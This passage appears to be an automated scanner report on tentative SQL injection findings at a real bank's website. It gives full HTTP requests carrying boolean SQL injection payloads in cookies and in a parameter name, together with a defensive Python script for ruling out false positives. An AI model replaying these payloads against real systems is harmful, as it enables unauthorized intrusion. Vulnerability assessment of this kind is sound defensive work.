Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascr
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US'%20and%201%3d2--%20; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:35 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=763627; Expires=Sun, 23 Oct 2011 12:25:35 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/js/font_sizes.js" type
...[SNIP]...

1.28. https://www.bankofamerica.com/Control.do [INTL_LANG cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The INTL_LANG cookie appears to be vulnerable to SQL injection. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 (URL-decoded: ' and 1=1--  and ' and 1=2-- ) were each appended to the cookie's normal value en_US. The scanner reports that the two requests produced different responses and takes this as a sign that the cookie value is concatenated into a SQL query.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives, and the captured evidence below does not confirm this finding: both responses are 200 OK with Content-Length 8843 and the same page title, and the only visible differences are in the Set-cookie headers (a fresh JSESSIONID in each response, a different ngen_throttle value in each, and hp_beta only in Response 1). Two further details argue for caution. The Cookie header in both requests carries INTL_LANG twice, and only the second copy was modified, so the application may well have read the unmodified first copy. And both responses send Set-cookie: INTL_LANG=en_US, which suggests the server replaced the tampered value rather than consuming it. Manually review the requests and responses, diffing the response bodies rather than the headers and replaying an unmodified baseline request to see how much the response varies on its own, before treating this as a vulnerability.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US'%20and%201%3d1--%20; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:45 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000hmxCUVp34qkihatilPZ3g4A:12rfuebu8; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=3443; Expires=Sun, 23 Oct 2011 12:44:44 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:44:44 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US'%20and%201%3d2--%20; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:45 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00006SxuGb4zOEFxDtKnEhXqurr:12rfueh75; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=443541; Expires=Sun, 23 Oct 2011 12:44:45 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="
...[SNIP]...

1.29. https://www.bankofamerica.com/Control.do [TLTSID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The TLTSID cookie appears to be vulnerable to SQL injection. The payloads 13270887'%20or%201%3d1--%20 and 13270887'%20or%201%3d2--%20 (URL-decoded: 13270887' or 1=1--  and 13270887' or 1=2-- ) were each appended to the cookie's existing value. The scanner reports that the two requests produced different responses and takes this as a sign that the cookie value is concatenated into a SQL query. Because this is an or 1=1 probe rather than an and 1=1 probe, a true positive would make the affected WHERE clause match every row, so it is the riskier payload to replay by hand against any code path that updates or deletes.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives, and the captured evidence below does not confirm this finding: both responses are 200 OK with Content-Length 8843 and the same page title, and the only visible differences are in the Set-cookie headers (ngen_throttle=614 with hp_beta=B in Response 1 against ngen_throttle=676387 in Response 2). Headers of that kind change independently of the injected input. Manually review the requests and responses, diffing the response bodies rather than the headers and replaying an unmodified baseline request to see how much the response varies on its own, before treating this as a vulnerability.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B98013270887'%20or%201%3d1--%20; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:49 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=614; Expires=Sun, 23 Oct 2011 12:24:49 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:24:49 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascri
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B98013270887'%20or%201%3d2--%20; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:50 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=676387; Expires=Sun, 23 Oct 2011 12:24:49 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/js/font_sizes.js" type
...[SNIP]...

1.30. https://www.bankofamerica.com/Control.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection. The payloads 24460292'%20or%201%3d1--%20 and 24460292'%20or%201%3d2--%20 (URL-decoded: 24460292' or 1=1--  and 24460292' or 1=2-- ) were each submitted as the name of an extra query-string parameter with the value 1 (see the request lines below). The scanner reports that the two requests produced different responses and takes this as a sign that the parameter name is concatenated into a SQL query.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives, and the captured evidence below does not confirm this finding: both responses are 200 OK with Content-Length 8843 and the same page title, and the only visible differences are in the Set-cookie headers (a fresh JSESSIONID in each response, a different ngen_throttle value in each, and hp_beta only in Response 1). Headers of that kind change independently of the injected input. Manually review the requests and responses, diffing the response bodies rather than the headers and replaying an unmodified baseline request to see how much the response varies on its own, before treating this as a vulnerability.
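The following Python script is an added example, not scanner output and not part of the report, of the manual check the note above asks for, applied to the pairs in findings 1.26 through 1.30: it parses raw HTTP responses, discards the headers that the captures show changing on every response (Date and the Set-cookie lines for ngen_throttle, hp_beta and JSESSIONID), hashes what remains, and replays a baseline to measure how noisy the endpoint is before reading anything into a true/false difference. The response strings it compares are constructed to mirror the shape of the captures in this report, with a stand-in page body; they are not copies of the captured responses.

```python
import hashlib

# Header names the captured pairs show changing on every response regardless
# of the injected input: Date, and Set-cookie for ngen_throttle, hp_beta and
# JSESSIONID. Everything else is kept and compared.
VOLATILE_HEADERS = {"date", "set-cookie", "set-cookie2"}


def split_response(raw):
    """Split a raw HTTP/1.1 response into (status line, {name: [values]}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def fingerprint(raw):
    """Digest of the parts of a response a SQL condition could plausibly change:
    status line, non-volatile headers and the full body."""
    status, headers, body = split_response(raw)
    stable = sorted((name, value) for name, values in headers.items()
                    if name not in VOLATILE_HEADERS for value in values)
    material = status + "\n" + repr(stable) + "\n" + body
    return hashlib.sha256(material.encode("latin-1", "replace")).hexdigest()


def classify(baseline, baseline_repeat, true_case, false_case):
    """Interpret a boolean pair against a replayed baseline.

    'noisy'         two unmodified requests already differ, so a true/false
                    difference proves nothing;
    'no-difference' the pair matches once volatile headers are ignored;
    'differs'       the pair diverges while the baseline is stable, which
                    earns a manual look but is still not proof of SQLi.
    """
    if fingerprint(baseline) != fingerprint(baseline_repeat):
        return "noisy"
    if fingerprint(true_case) == fingerprint(false_case):
        return "no-difference"
    return "differs"


# Constructed sample responses shaped like the report's captures (assumption:
# the real 8843-byte body is replaced by a short stand-in).
PAGE = ("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\r\n"
        "<html><head><title>Bank of America | Home | Personal</title></head>"
        "<body>stand-in body</body></html>")


def build_response(body, cookies):
    """Assemble a response with the report's fixed headers plus the given
    Set-cookie values (sample data, not a live capture)."""
    lines = ["HTTP/1.1 200 OK",
             "Server: Sun-ONE-Web-Server/6.1",
             "Date: Tue, 26 Apr 2011 12:27:47 GMT",
             "Content-type: text/html;charset=ISO-8859-1"]
    lines += ["Set-cookie: %s; Path=/; Domain=.bankofamerica.com" % c for c in cookies]
    lines.append("Content-Length: %d" % len(body))
    return "\r\n".join(lines) + "\r\n\r\n" + body


def report_like_pair():
    """What findings 1.26-1.30 actually show: same body and length, with only
    the throttle and beta cookies differing between the two responses."""
    baseline = build_response(PAGE, ["ngen_throttle=6967"])
    baseline_repeat = build_response(PAGE, ["ngen_throttle=614", "hp_beta=B"])
    true_case = build_response(PAGE, ["ngen_throttle=353", "hp_beta=B"])
    false_case = build_response(PAGE, ["ngen_throttle=843211"])
    return classify(baseline, baseline_repeat, true_case, false_case)


def genuine_pair():
    """What a real boolean-based signal looks like: the false branch changes
    the body while the replayed baseline stays stable."""
    baseline = build_response(PAGE, ["ngen_throttle=1"])
    baseline_repeat = build_response(PAGE, ["ngen_throttle=2"])
    true_case = build_response(PAGE, ["ngen_throttle=3"])
    false_case = build_response("<html><body>no matching record</body></html>",
                                ["ngen_throttle=4"])
    return classify(baseline, baseline_repeat, true_case, false_case)


if __name__ == "__main__":
    print("report-like pair:", report_like_pair())
    print("genuine pair:    ", genuine_pair())
```

Run against responses captured from a proxy, the same four-request pattern (baseline, baseline again, true payload, false payload) separates endpoint noise from an actual condition-dependent change; a result of no-difference on pairs like the ones in this section means the scanner's signal came from headers the server varies on its own, which is exactly why its confidence is marked Tentative.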

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll&124460292'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:45:10 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000MpYwfcy7zThLYbGwnLi-IAJ:12rfue8je; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=303; Expires=Sun, 23 Oct 2011 12:45:09 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:45:09 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll&124460292'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
